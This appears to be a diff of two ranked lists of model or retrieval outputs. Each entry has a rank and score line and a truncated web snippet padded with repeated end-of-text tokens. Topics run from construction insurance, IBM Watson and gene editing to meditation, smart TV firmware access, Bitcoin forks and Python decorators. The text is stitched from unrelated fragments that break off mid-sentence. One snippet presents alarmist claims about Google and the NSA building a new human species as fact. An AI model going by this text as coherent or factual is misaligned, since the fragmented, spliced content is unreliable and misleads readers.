exploited)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +In other words Contractors' All Risks (CAR) insurance is a property insurance by which any building or civil engineering project under construction is protected against accidents which may lead to physical damage to or the destruction of works in progress or materials brought to the site.Contractors' all risk (CAR) insurance policies are considered non-standard insurance policies.Construction projects typically involve two primary types of risk: damage to the property, and third-party claims of injury or damage.Damage to the property could include the structure as a result of poor construction, or damage during a renovation.Third-parties, including injuries subtend by subcontractor while working in the engineering project site. Contractors' all risk (CAR) insurance bridges these two risks into a common policy, and helps cover the gap between exclusions that would otherwise exist when using separate policies.BREAKING DOWN 'Contractors' All Risks (CAR) Insurance' CAR insurance is typically taken out jointly by both the contractor and the employer, with other parties such as financing companies having the option of being named to the policy. Because multiple parties are included in the policy they each retain the right to file a claim against the insurer, although all parties also have the duty of informing the insurer of any injuries and damages that may result in a claim.Aim and objective of CAR insurance policy is to ensure the protection of all parties involves in a project, regardless of the type of damage to the property or who caused the damage. Insurers who underwrite this type of policy lose the right to subrogation, meaning that if it pays out funds to one party in the contract then it cannot seek to recover those funds from another party in the contract. For example, if the owner of a large building and the contractor working on the building are on the same CAR policy, any costs ================================================================================ -Rank = 68; Score = 3063808.0 -<|begin_of_text|>I spent half an hour speaking with IBM Watson VP John Gordon on Tuesday, and no matter how many ways I asked it, he would not acknowledge a gap between peoples’ perceptions of Watson and what the “cognitive computing” system is actually capable of doing. I know there’s misunderstanding out there — I just know it — but Gordon spun his responses to focus on inspiration rather than disappointment, about how easy it is to learn Watson and build new applications now that it’s available as a set of software products and cloud APIs. +Rank = 67; Score = 1703936.0 +<|begin_of_text|>Campus-based technology courses can be expensive, which is why many people are choosing to take free technology courses online. Some of the best universities in the world offer free technology courses. Examples include Stanford University, the Massachusetts Institute of Technology and the Tokyo Institute of Technology. -It annoyed me at first, but the more I think about it, the less I can fault his strategy. It wasn’t so long ago, he noted, that it was still only Ph.Ds. in IBM Research programming Watson systems for early users; today, pretty much anybody with an application and some data can start experimenting with it. There’s not a lot of point in dwelling on whether or not people really get the artificial intelligence, because anyone willing to give the cloud services a shot will soon figure out all they really need to know about it — that it works or doesn’t work for what they want to do. +1. The Massachusetts Institute of Technology -Advertisement +The Massachusetts Institute of Technology OpenCourseWare site is undoubtedly the best place to find free technology courses online. There are hundreds of courses to choose from, which means you can find a course on nearly any technology topic imaginable. -I think that’s becoming true too for deep learning, the red-hot AI field that, like Watson, is also the subject of lofty claims and more than a modicum of hyperbole. IEEE Spectrum recently published an interview with machine learning expert Michael Jordan, of the University of California, Berkeley, in which he addresses some of the bigger misconceptions about the technology. +2. Delft University of Technology -His comments boil down to this: Deep learning is not that revolutionary, it’s only really useful for a limited number of things and deep learning models certainly do not mimic real-life brain activity. The latter is a lazy and inaccurate metaphor. +The Delft University of Technology offers a number of free technology courses. Most of Delft's courses cover advanced topics that would be of interest to students in engineering or related fields. New courses are constantly being added to the site. -(Jordan later clarified some misinterpretations of his opinions — particularly regarding big data, which is a topic for a whole other day — in a blog post. Earlier, in September, he did an Ask Me Anything session on Reddit where he also elaborates on where he sees promise and hype in deep learning.) +3. University of California, Berkeley -But even if Jordan is largely correct, it might be a waste of energy for most of us to stress too much over explanations of how exactly the models work or whether researchers are overstating the import of their results. Yann LeCun, a New York University researcher and director of Facebook’s AI efforts, probably said it best in a (largely supportive) response to Jordan’s comments via Facebook wall post: +If you're looking for free technology courses that you can download to your MP3 player or computer, you'll definitely want to check out UC Berkeley on iTunes. Self-learners can gain access to a wide range of technology courses, lectures and events. Additional courses can be found though webcast.berkeley.edu. -There is nothing wrong with deep learning as a topic of investigation, and -================================================================================ -Rank = 69; Score = 2998272.0 -<|begin_of_text|>Genetically modified animals are animals that have been genetically modified for a variety of purposes including producing drugs, enhancing yields, increase resistance to disease, etc. The vast majority of genetically modified animals are at the research stage with the number close to entering the market remains small.[1] +4. Stanford University -Production [ edit ] +Berkeley isn't the only university that makes free technology courses available through iTunes. Stanford University has a similar set-up through their Stanford iTunes project. There are quite a few technology courses and lectures that can be accessed for free already, and more are added on a weekly basis. -The process of genetically engineering mammals is a slow, tedious, and expensive process.[2] As with other genetically modified organisms (GMOs), first genetic engineers must isolated the gene they wish to insert into the host organism. This can be taken from a cell containing the gene[3] or artificially synthesised.[4] If the chosen gene or the donor organism's genome has been well studied it may already be accessible from a genetic library. The gene is then combined with other genetic elements, including a promoter and terminator region and usually a selectable marker.[5] +5. Rice University -A number of techniques are available for inserting the isolated gene into the host genome. With animals DNA is generally inserted into using microinjection, where it can be injected through the cell's nuclear envelope directly into the nucleus, or through the use of viral vectors.[6] The first transgenic animals were produced by injecting viral DNA into embryos and then implanting the embryos in females.[7] It is necessary to ensure that the inserted DNA is present in the embryonic stem cells.[8] The embryo would develop and it would be hoped that some of the genetic material would be incorporated into the reproductive cells. Then researchers would have to wait until the animal reached breeding age and then offspring would be screened for presence of the gene in every cell, using PCR, Southern hybridization, and DNA sequencing.[9] +Connexions, a Rice University organization, hosts a wide variety of scholarly content. The site offers hundreds of free technology courses. Some courses consist of small 'knowledge chunks.' Other courses include multiple modules, books and course notes. -New technologies are making genetic modifications easier and more precise.[2] Gene targeting techniques, which creates double-stranded breaks and takes advantage on the cells natural homologous recombination repair systems, have been developed to target insertion to exact locations. Genome editing uses artificially engineered nucleases that create breaks at specific points. There are four families of engineered nucleases: meganucleases,[10][11] zinc finger nucleases,[12][13] transcription activator-like effector nucleases (TALENs),[14][15] and the Cas9-guideRNA system (adapted from CRISPR).[16][17] TALEN and CRISPR are the two most commonly used and each has its own advantages.[18] TALENs have greater target specificity, while CRISPR is easier to design and more efficient.[18] The development of the CRISPR-C +6. The Open University + +There are more than 50 free technology courses that can be taken through The Open University's online LearningSpace. Courses range from the introductory level to the advanced level and take anywhere from two hours to two weeks to complete. + +7. Utah State University + +Self-learners around the world can choose from more than a dozen free technology courses when they visit Utah State University's OpenCourseWare site. Technology topics include, but are not limited to: online communities, instructional technology, interactive learning and computer engineering. + +8. University of Southern Queensland + +The University of Southern Queensland offers two different courses that may be of interest to technology buffs. Both of the text-based courses are free and include materials that are practical for self-learners. + +9. Dixie State College of Utah + +The CIT Department at the ================================================================================ -Rank = 70; Score = 2981888.0 -<|begin_of_text|>On a sweltering Monday in late June 2015, the city council in Charlotte, North Carolina, met to discuss, among other items in a seven-hour marathon, how to carry out a controversial new approach to predicting police misconduct. Opinions were divided, and the discussion was tense. One council member was afraid of “upsetting the troops.” A second called the use of data about individual police officers an invasion of privacy. In response, another said, “I’m always a fan of third parties looking over our shoulder.” +Rank = 68; Score = 1687552.0 +<|begin_of_text|>Russian president Vladimir Putin has joined the war of words concerning the international race to develop artificial intelligence. Speaking to students last Friday, Putin predicted that whichever country leads the way in AI research will come to dominate global affairs. -Finally, Kerr Putney, soon to be sworn in as Charlotte’s new police chief, got up to reassure the council. He spoke about the need to “balance public need versus what officers may want.” He seemed to persuade several members. +“Artificial intelligence is the future, not only for Russia, but for all humankind,” said Putin, reports RT. “It comes with colossal opportunities, but also threats that are difficult to predict. Whoever becomes the leader in this sphere will become the ruler of the world.” -“So it won’t be used for retribution?” one asked. “Absolutely not,” Putney replied. +“It comes with colossal opportunities, but also threats.” -Minutes later, the council voted to work with a group of data scientists to develop a sophisticated system for predicting when cops will go bad. These researchers, part of the White House’s Police Data Initiative, say their algorithm can foresee adverse interactions between officers and civilians, ranging from impolite traffic stops to fatal shootings. Their system can suggest preventive measures — an appealing prospect for police departments facing greater scrutiny and calls for accountability. Two other large departments — the Los Angeles County sheriff and the Knoxville police — have signed on to use the research to develop new systems, and several other agencies have expressed interest. The scientists hope their method can serve as a template for stopping police misbehavior before it happens. +The development of artificial intelligence has increasingly become a national security concern in recent years. It is China and the US (not Russia) which are seen as the two frontrunners, with China recently announcing its ambition to become the global leader in AI research by 2030. Many analysts warn that America is in danger of falling behind, especially as the Trump administration prepares to cut funding for basic science and technology research. -Many police departments have early warning systems — software that tracks each officer’s performance and aims to forecast potential problems. The systems identify officers with troubling patterns of behavior, allowing superiors to monitor these cops more closely or intervene and send them to counseling. +Although it’s thought that artificial intelligence will help boost countries’ economies in a number of areas, from heavy industry to medical research, AI technology will also be useful in warfare. Artificial intelligence can be used to develop cyber weapons, and control autonomous tools like drone swarms — fleets of low-cost quadcopters with a shared ‘brain’ that can be used for surveillance as well as attacking opponents. -The researchers, a mixed group of graduate and undergraduate students working together at the University of Chicago with backgrounds in statistics, programming, economics and related disciplines, are trying to build a better kind of early warning system. They began their task last summer with a request from the Charlotte-Mecklenburg Police Department: Predict when police officers would participate in adverse interactions with civilians. +Both China and the US are currently researching this technology, and in his speech on Friday, Putin predicted that future wars would be fought by countries using drones. “When one party's drones are destroyed by drones of another, it will have no other choice but to surrender,” said the Russian president, according to the Associated Press. -To build their early warning system, the University of Chicago group first looked for signals in the data that an officer might be going astray. They used a comprehensive data set of interactions between cops and the public gathered by Charlotte police officials over more than a decade. The researchers found that the most potent predictor of adverse interactions in a given year was an officer’s own history. C +Recently, Elon Musk and 116 other technology leaders sent a petition to the United Nations calling for new regulations on how such AI weapons are developed. The group stated that the introduction of autonomous technology would be tantamount to a “third revolution in warfare,” following the development of gunpowder and nuclear weapons. + +An AI arms race doesn’t necessarily have to be a winner-takes-all scenario, though. Putin noted that Russia did not want to see any one country “monopolize” the field, and said instead: “If we become leaders in this area, we will share this know-how with entire world, the same way we share our nuclear technologies today.” + +Update September 4th, 5:40AM ET: Elon Musk offers his cheery perspective on Twitter:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 71; Score = 2981888.0 -<|begin_of_text|>Meditation involves silencing our mind. It is not an intellectual activity, but an attempt to expand our consciousness and be aware of our ‘real sense of being.’ Meditation can be a practical tool for relaxation, concentration and better health; it can also be an invaluable tool to self discovery. Through meditation we develop the capacity to be content with ourselves as we are. It is a happiness not dependent on external wealth and success. If practiced correctly, meditation can be a powerful antidote to depressive thoughts. +Rank = 69; Score = 1671168.0 +<|begin_of_text|>Originally called “connected TVs,” and now they are called as “smart TVs”. Any television that can be connected to the Internet to access services, use apps and behave in some way as our computers with web browser. Smart TVs connect to Internet via wired Ethernet connection or Wi-Fi to connect to a home network. Smart TVs require computer chips to juggle video processing, multiple screens and an Internet connection. They also use memory to buffer streaming video and music, and need additional processing power to deal with graphics. The TVs can be controlled by voice commands and by apps running on some Smartphone. -How To Meditate +Dan Reynolds, information security solution and training expert of International Institute of cyber security explains that these Smart TVs are not that smart and the security of software isn’t exactly perfect. Smart TVs resemble for us the Internet of things (IoT) but old vulnerabilities which were considered to have completely disappeared are new vulnerabilities again in the Internet of Things (IoT). Sometimes you can easily find a flaw that can enable you to take a variety of actions on the TV, including accessing potentially sensitive data, remote files and information, the drive image and eventually gain root access to the device. -It is hard to pick up meditation from just reading an article, but I would like to share a few basic pointers about what meditation involves. No matter what form of meditation you follow, the basic shared principle is to quieten your thoughts and mind. We can sit in a chair for many hours, but, if thoughts continually pass through our mind then our meditation will be ineffective. Ultimately the aim is to have a mind free of thoughts. It is in this inner silence that we can experience a consciousness of real peace. +In the article we will be covering different aspects of two most famous brands of Smart TVs Samsung and LG with the help of ethical hacking course professor of IIcybersecurity. -At first glance, people may find the concept of stopping thoughts very difficult. If you try sitting silent for a while, you will probably be inundated with thoughts. When giving meditation classes, the difficulty of controlling the thoughts is a common experience. However, if you sincerely try, you can learn to reduce the power of thoughts over yourself. +Understanding SAMSUNG SMART TV Operating system -These are some tips I suggest for controlling your thoughts: +Tizen is an operating system based on the Linux kernel and the GNU C Library implementing the Linux API. It targets a very wide range of devices including smart phones, tablets, in-vehicle infotainment (IVI) devices, smart TVs, PCs, smart cameras, wearable computing, Blu-ray players, printers and smart home appliances. Its purpose is to offer a consistent user experience across devices. Tizen would be implemented in Samsung TVs from 2015. -You control your thoughts not the other way around. Always remember it is you who can decide which thoughts to pursue and which to reject. Never feel a slave to your own thoughts, even if at times they seem powerful. +There are some online community which are working over the Samsung smart TV OS research like ( Sammygo) mentions Dan Reynolds, information security solution and training expert. -Patience. Don’t expect a silent mind after the first few attempts. We have been thinking all our life; to change a habit of a lifetime requires persistence and perseverance. Meditation, like any worthwhile activities requires dedicated and focused intensity. +How to do analysis over Samsung Smart TV firmware -Detachment. If you keep rejecting thoughts, what happens is that you may be aware of thoughts, but, they have much less intensity. A thought bubbles up, but, it becomes easier to detach from it. You start to see thoughts as independent and outside of yourself. This is a good sign, it shows you are developing the capacity to separate the sense of self from your mental thoughts. From this point it becomes easier to stop your thoughts completely. +ExLink connector consist of a cable which has in one side a 3.5mm jack, like the audio ones, and on the other side an RS232 ( Serial ) DB9 connector. This cable will allow you to connect your PC computer to the TV, and enter in the Serial mode. With this you can use a serial Communications Software, like Hyperterminal, Putty from Windows or Linux. -Concentrate on something. It is hard to control our thoughts through the power of the mind. To achieve inner silence it is advisable to choose something to focus our attention on. This may be the +Connecting to Samsung TV + +Put the TV into Standby Mode, press [Info] then [Menu] ================================================================================ -Rank = 72; Score = 2981888.0 -<|begin_of_text|>What do the San Francisco Giants, Cryptolocker and nuclear war all have in common? They all involve conflicts in which incentives, payouts and winning strategies can be analyzed with game theory. Game theory is a branch of mathematics that models conflict and cooperation between parties and is used in many real-world decision making scenarios, inside and outside the Information Security field. Game theory is particularly useful in analyzing the extortionist / victim dynamic present in ransomware infection scenarios. +Rank = 70; Score = 1671168.0 +<|begin_of_text|>Despite the events depicted in The Imitation Game, Alan Turing did not invent the machine that cracked Germany’s codes during World War II—Poland did. But the brilliant mathematician did invent something never mentioned in the film: a mathematical tool for judging the reliability of information. His tool sped up the work of deciphering encoded messages using improved versions of the Polish machines. -Ransomware comes in many varieties and works in different ways, but the basic setting is the same: cybercriminals infect a computer with malicious software that blocks access to the system or important files until the ransom is paid. +Now researchers studying rhesus monkeys have found that the brain also uses this mathematical tool, not for decoding messages, but for piecing together unreliable evidence to make simple decisions. For Columbia University neuroscientist Michael Shadlen and his team, the finding supports a larger idea that all the decisions we make—even seemingly irrational ones—can be broken down into rational stastical operations. “We think the brain is fundamentally rational,” says Shadlen. -The conventional wisdom in information security regarding ransomware is to never pay. But, why? The answer is a little more nuanced than “never pay” or “always pay.” The decision is a complex scenario of incentives and payoffs. Who stands to gain when ransomware is paid? Who gains when it is not paid? +Invented in 1918, the German Enigma machine created a substitution cipher by swapping the original letters in a message for new ones, producing what seemed like pure gibberish. To make the cipher more complicated, the device had rotating disks inside that swiveled each time a key was pressed, changing the encoding with each keystroke. The process was so complex that even with an Enigma machine in hand, the Germans could decipher a message only by knowing the initial settings of those encryption dials. -This talk will use the familiar topic of ransomware to introduce participants to game theory concepts like rational decision-making, zero-sum games, incentives, utility and Nash Equilibrium – all important tools that can help solve security problems. By analyzing ransomware decision-making with a game theory mindset, participants will learn a new set of skills and a new way of incentive-driven thinking.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Turing created an algorithm that cut down the number of possible settings the British decryption machines, called bombes, had to test each day. Working at the secret Bletchley Park facility in the U.K., Turning realized that it was possible to figure out if two messages had come from machines with rotors that started in the same positions—a key piece of information for figuring out those positions. Line up two encoded messages, one on top of the other, and the chance that any two letters will be the same is slightly greater if both messages came from machines with the same initial settings. This is because in German, as in English, certain letters tend to be more common, and the encryption process preserved this pattern. + +Turing’s algorithm essentially added up the probabilities of those clues being useful. It also indicated when the cumulative odds were good enough to either accept or reject that the two messages being compared came from machines with the same rotor states. This statistical tool, called the sequential probability ratio test, proved to be the optimal solution to the problem. It saved time by allowing the Bletchley codebreakers to decide whether two messages were useful while looking at the fewest number of letters possible. Turning wasn ================================================================================ -Rank = 73; Score = 2965504.0 -<|begin_of_text|>“There will come a time when it isn't ‘They’re spying on me through my phone’ anymore. Eventually, it will be ‘My phone is spying on me.’” ― Philip K. Dick +Rank = 71; Score = 1671168.0 +<|begin_of_text|>The business of male escort services in India is often complex and dangerous. -If ever Americans sell their birthright, it will be for the promise of expediency and comfort delivered by way of blazingly fast Internet, cell phone signals that never drop a call, thermostats that keep us at the perfect temperature without our having to raise a finger, and entertainment that can be simultaneously streamed to our TVs, tablets and cell phones. +Last week, the police in New Delhi uncovered a racket after rescuing an aspiring escort who was kidnapped by a fake agency and held for ransom in Hapur in the northern state of Uttar Pradesh. The 26-year-old was allegedly lured by the promise of earning between Rs15,000 and Rs25,000 a day, much more than what he made as a salesman selling mobile phones at a store in the national capital. -Likewise, if ever we find ourselves in bondage, we will have only ourselves to blame for having forged the chains through our own lassitude, laziness and abject reliance on internet-connected gadgets and gizmos that render us wholly irrelevant. +The incident comes in the wake of the rapid proliferation of escort services across India, taking advantage of the internet, social media networks, and technology like WhatsApp to make transactions quick and smooth. Over the years, both male and female escort services have become well-versed in techniques such as Search Engine Optimisation (SEO) to make sure their websites are easily visible to those seeking company or a little more online. And these methods have paid off: one anonymous escort agency owner told The Times of India that the industry has a daily turnover of around Rs10 crore in Mumbai and Rs50 crore in New Delhi. -Indeed, while most of us are consumed with our selfies and trying to keep up with what our so-called friends are posting on Facebook, the megacorporation Google has been busily partnering with the National Security Agency (NSA), the Pentagon, and other governmental agencies to develop a new “human” species, so to speak. +For some young Indians, among them struggling actors or models, signing up as an escort is a way to make some serious money, anywhere between Rs20,000 to Rs40,000 a day, by one estimate. And while many escort agencies advertise their services in PG terms like “friendship,” there’s a whole range of options available, including the “girlfriend experience” that blends transactional sex with the intimacy of a relationship, albeit one that is paid for. -In other words, Google—a neural network that approximates a global brain—is fusing with the human mind in a phenomenon that is called “singularity,” and they’ve hired transhumanist scientist Ray Kurzweil to do just that. Google will know the answer to your question before you have asked it, Kurzweil said. “ It will have read every email you will ever have written, every document, every idle thought you’ve ever tapped into a search-engine box. It will know you better than your intimate partner does. Better, perhaps, than even yourself.” +But as the Hapur kidnapping shows, the shadowy workings of the industry have left a lot of escorts and aspiring escorts vulnerable. In July, India banned 240 escort websites in a bid to stem the spread of these services but the move was widely criticised as ineffective. After all, many of the websites could simply switch to a new domain and resume business as usual. -But here’s the catch: the NSA and all other government agencies will also know you better than yourself. As William Binney, one of the highest-level whistleblowers to ever emerge from the NSA said, “ The ultimate goal of the NSA is total population control.” +So far, India’s laws have mainly concerned themselves with prostitution and human trafficking, with a focus on women and children, but there’s still a lack of comprehensive regulation. Under the Immoral Traffic Prevention Act of 1956, it’s soliciting sex that’s a crime, besides running a brothel or forcing individuals to engage in prostitution. So technically, prostitution itself isn’t illegal. But in reality, the laws are interpreted in line with the society’s moral code that stigmatises sex workers and keeps them working in the shadows, vulnerable to exploitation. -Science fiction, thus, has become fact. +The situation is more complicated when it comes to +================================================================================ +Rank = 72; Score = 1671168.0 +<|begin_of_text|>I created a model that learns how to turn outlines into stylish and colorful icons. Icon and logo design is difficult — expert human designers choose from line weights, colors, textures and shapes to create beautiful icons such as these (I’m a big fan). But there seems to be a pattern to how each designer make their choices. So, I decided it would be interesting to try to train a model that learns a designer’s style, and then takes any freely available icon outlines (e.g. from the Noun Project ), and color and style them exactly as how a designer would have completely automatically. I built this as part of my Stanford CS229 final project. -We’re fast approaching Philip K. Dick’s vision of the future as depicted in the film Minority Report. There, police agencies apprehend criminals before they can commit a crime, driverless cars populate the highways, and a person’s biometrics are constantly scanned and used to track their movements, target them for advertising, and keep them under perpetual surveillance. +I’ve made my code and pre-trained model weights available at https://github.com/mosessoh/iconcolor. -Cue the dawning of the Age of the Internet of Things, in which internet-connected “things” will monitor your home, your health and your habits +How I envision this being used is that someone starts a side project, and needs an logo/icon for branding. Let’s say her side project is about sharing beautiful royalty free images (e.g. Unsplash). She grabs an icon she likes (e.g. this camera icon from the IconBros icon pack that went viral on Product Hunt), and submits it to the model, and voila — a fully colored and stylized icon. Note how the model uses some darker shades of orange at the sides to give it some visual depth, and adds a splash of green to really make it pop. + +Why I think this might be useful + +Beautiful icon outlines are easy to find online, relative to colored icons. This can help someone generate an original & unique colored icon for whatever project they need. It might not be as good as Yoga Perdana’s or Ivan Bobrov’s work, but I think it’s much better than using a generic solid icon. + +How it works + +There are more details in the poster below (I made that for CS229), but at a high level, this is modelled as a supervised learning problem. I take in a 1 x 128 x 128 grayscale icon and produce a 3 x 128 x 128 RGB icon which is then compared to a true RGB icon using some loss function during training. The model is a Convolutional Neural Network called a U-Net which I trained on an icon set from Smashicons (I’m a premium subscriber — there isn’t a more complete set of ). I taught the model to convert outlines to yellow style icons, but this model can learn to convert between arbitrary styles since nothing is hard-coded. + +Poster for my CS229 final project + +The top 3 things I learned from my ================================================================================ -Rank = 74; Score = 2965504.0 -<|begin_of_text|>Decorators modify functions. Beginning with the basics, learn how to use decorators in a variety of ways. Execute code when a function is parsed or called. Conditionally call functions and transform inputs and outputs. Write customizable decorators that accept arbitrary arguments. And, if necessary, easily make sure your decorated function has the same signature as the original. +Rank = 73; Score = 1654784.0 +<|begin_of_text|>For a broader coverage of forks, see Fork (blockchain) + +Bitcoin forks are defined variantly as changes in the protocol of the bitcoin network or as the situations that occur "when two or more blocks have the same block height".[1] A fork influences the validity of the rules. Forks are typically conducted in order to add new features to a blockchain, to reverse the effects of hacking or catastrophic bugs. Forks require consensus to be resolved or else a permanent split emerges. + +Forks of the client software -Decorators. The shear mention of them brings fear to even the seasoned Python programmer. +The following are forks of the software client for the bitcoin network: -Okay, maybe not. But decorators, at least in this author's opinion, have a weird syntax and inevitably complicated implementations that are especially foreign (I think) to many who have gotten used to the simplicity of Python. +All three software clients attempt to increase transaction capacity of the network. None achieved a majority of the hash power.[2] -1 The Basics Decorators modify functions. More specifically, a decorator is a function that transforms another function. When you use a decorator, Python passes the decorated function -- we'll call this the target function -- to the decorator function, and replaces it with the result. Without decorators, it would look something like this: #'s 1 def decorator_function ( target ): +Intended hard forks splitting the cryptocurrency -2 # Do something with the target function +Hard forks splitting bitcoin (aka "split coins") are created via changes of the blockchain rules and sharing a transaction history with bitcoin up to a certain time and date. The first hard fork splitting bitcoin happened on 1 August 2017, resulting in the creation of Bitcoin Cash. -3 target. attribute = 1 +The following is a list of hard forks splitting bitcoin by date and/or block: -4 return target +Bitcoin Cash: Forked at block 478558, 1 August 2017, for each bitcoin (BTC), an owner got 1 Bitcoin Cash (BCH) -5 +Bitcoin Gold: Forked at block 491407, 24 October 2017, for each BTC, an owner got 1 Bitcoin Gold (BTG) -6 def target ( a, b ): +Bitcoin SV: Forked at block 556766, 15 November 2018, for each Bitcoin Cash (BCH), an owner got 1 Bitcoin SV (BSV). -7 return a + b +Intended soft forks splitting from not-most-work block -8 +The fork fixing the value overflow incident was controversial because it was announced after the exploit was mined. -9 # This is what the decorator actually does +Unintended hard forks -10 target = decorator_function ( target ) +Two hard forks were created by "protocol change" definition: -This code has the exact same functionality, but uses decorators. Note that I can name my decorator function whatever I want. Here, I've chosen 'decorator_function': #'s 1 def decorator_function ( target ): +March 2013 Chain Fork (migration from BerkeleyDB to LevelDB caused a chain split) [3] -2 # Do something with the target function +CVE-2018-17144 (Bitcoin 0.15 allowed double spending certain inputs in the same block. Not exploited)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 74; Score = 1622016.0 +<|begin_of_text|>On a sweltering Monday in late 